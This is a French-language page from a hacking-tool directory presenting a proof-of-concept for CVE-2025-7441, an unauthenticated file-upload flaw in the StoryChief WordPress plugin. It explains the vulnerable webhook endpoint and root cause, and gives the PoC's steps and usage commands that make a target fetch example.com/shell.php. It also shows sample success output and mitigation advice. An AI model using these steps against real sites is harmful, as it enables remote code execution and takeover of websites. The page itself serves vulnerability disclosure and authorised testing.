Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-7441 — StoryChief <= 1.0.42 - Téléchargement arbitraire de fichiers non authentifié | Kitploit
Outils/GitHubGitHub/anothersec/cve-2025-7441
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubanothersec/cve-2025-7441

CVE-2025-7441

StoryChief <= 1.0.42 - Téléchargement arbitraire de fichiers non authentifié

Voir le dépôt
31il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-7441

CVE-2025-7441 StoryChief 1.0.42 - Téléchargement arbitraire de fichiers

Vulnérabilité (CVE-2025-7441) - Résumé technique

  • Composant affecté : plugin WordPress StoryChief
  • Type de vulnérabilité : Téléchargement arbitraire de fichiers non authentifié
  • Point de terminaison vulnérable : /wp-json/storychief/webhook
  • Cause racine : Le plugin accepte un payload JSON de webhook qui contient une URL (sous data.featured_image.data.sizes.full) et effectue une requête HTTP GET côté serveur sur cette URL sans validation suffisante (pas de liste blanche de domaines, vérifications MIME/contenu insuffisantes, et les fichiers sont enregistrés dans des chemins de téléchargement publics).
  • Impact : Un attaquant non authentifié peut amener le serveur à récupérer et à persister du contenu contrôlé par l'attaquant dans le répertoire de téléchargement WordPress (par exemple wp-content/uploads/YYYY/MM/<nomfichier>). Si le fichier téléchargé peut être interprété/exécuté par le serveur (par exemple, un fichier PHP et le serveur autorise l'exécution de PHP à cet emplacement), cela conduit à une exécution de code à distance (RCE) et à une compromission complète du site.
  • CVSS (exemple) : 9.8 (Critique) — la sévérité dépend de la configuration d'hébergement et des autorisations d'exécution.

À propos de ce PoC (CVE-2025-7441)

Ce script automatise le flux typique de vérification d'exploitation pour la vulnérabilité :

  1. Construire un payload JSON de webhook qui place une URL de fichier distant dans data.featured_image.data.sizes.full.
  2. Calculer une signature HMAC-SHA256 sur le payload (le script calcule en utilisant une clé vide par défaut) et la stocker dans meta.mac.
  3. Envoyer le payload en POST à <site_url>/wp-json/storychief/webhook.
  4. Vérifier si le fichier récupéré est présent au chemin de téléchargement attendu :

<site_url>/wp-content/uploads///

Si le fichier répond avec HTTP 200, le script signale un succès ; sinon il affiche <failed to upload>.

Le script inclut les options suivantes : --file-url, --verbose, --use-curl et --retries.

Utilisation

python3 CVE-2025-7441.py <site_url>

Argument positionnel

  • <site_url> — URL de base du site cible. Exemple : http://127.0.0.1:5000/ ou https://target.example/

Options

  • --file-url — Remplace l'URL de fichier distant par défaut utilisée par le PoC. Par défaut : exemple codé en dur d'URL GitHub brute. Exemple : --file-url https://127.0.0.1:5000/zip.php
  • --verbose — Active la sortie détaillée (affiche les détails de la requête/réponse et l'avancement de la vérification).
  • --use-curl — Utilise un sous-processus curl pour délivrer le POST (mode de secours). Nécessite que curl soit installé.
  • --retries — Nombre de tentatives pour vérifier le chemin de téléchargement attendu pour le fichier. Par défaut : 1. Utilisez par exemple --retries 5 pour interroger plusieurs fois.

Exemple de commande

root@kitploit:~
python3 CVE-2025-7441.py http://127.0.0.1:5000/

Spécifier une URL de fichier distant personnalisée

root@kitploit:~
python3 CVE-2025-7441.py http://127.0.0.1:5000/  --file-url https://example.com/shell.php

Sortie détaillée et vérifications multiples

root@kitploit:~
python3 CVE-2025-7441.py http://127.0.0.1:5000/ --file-url https://example.com/shell.php --verbose --retries 5

Utiliser curl pour délivrer le POST

root@kitploit:~
python3 CVE-2025-7441.py http://127.0.0.1:5000 --file-url https://example.com/shell.php --use-curl --verbose

Sortie :

root@kitploit:~
[*] Target: https://127.0.0.1:5000
[*] file_url: https://127.0.0.1:5000/ZIP.php
[*] retries: 3
[*] use_curl: False
[+] computed hmac : 3f2a9b0e4d6c5a1f0b9d6e3c2a1f4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1
[*] Sending POST via requests...
[*] POST status: 200
[*] Response body (truncated):
{"permalink":"/wp-content/uploads/2025/10/ZIP.php","id":12345}
[*] Checking (1/3): https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
[+] success! [+]
https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php

Atténuation

Atténuation et correction À court terme :

  • Mettre à jour StoryChief vers une version corrigée dès qu'elle est disponible.
  • Bloquer ou restreindre /wp-json/storychief/webhook via le WAF ou les règles du serveur.
  • Restreindre les récupérations sortantes du serveur ou le trafic vers des domaines non fiables.

Conseils aux développeurs :

  • Valider les types de fichiers et leur contenu après toute récupération distante ; vérifier les images à l'aide d'analyseurs sécurisés et rejeter les fichiers invalides.
  • Exiger une authentification pour les webhooks qui entraînent des téléchargements côté serveur ou la création de fichiers.
  • S'assurer que la vérification HMAC/signature est implémentée et appliquée.
  • Stocker le contenu téléchargé en dehors de la racine web ou désactiver l'exécution des fichiers téléchargés dans wp-content/uploads.
Télécharger l’outil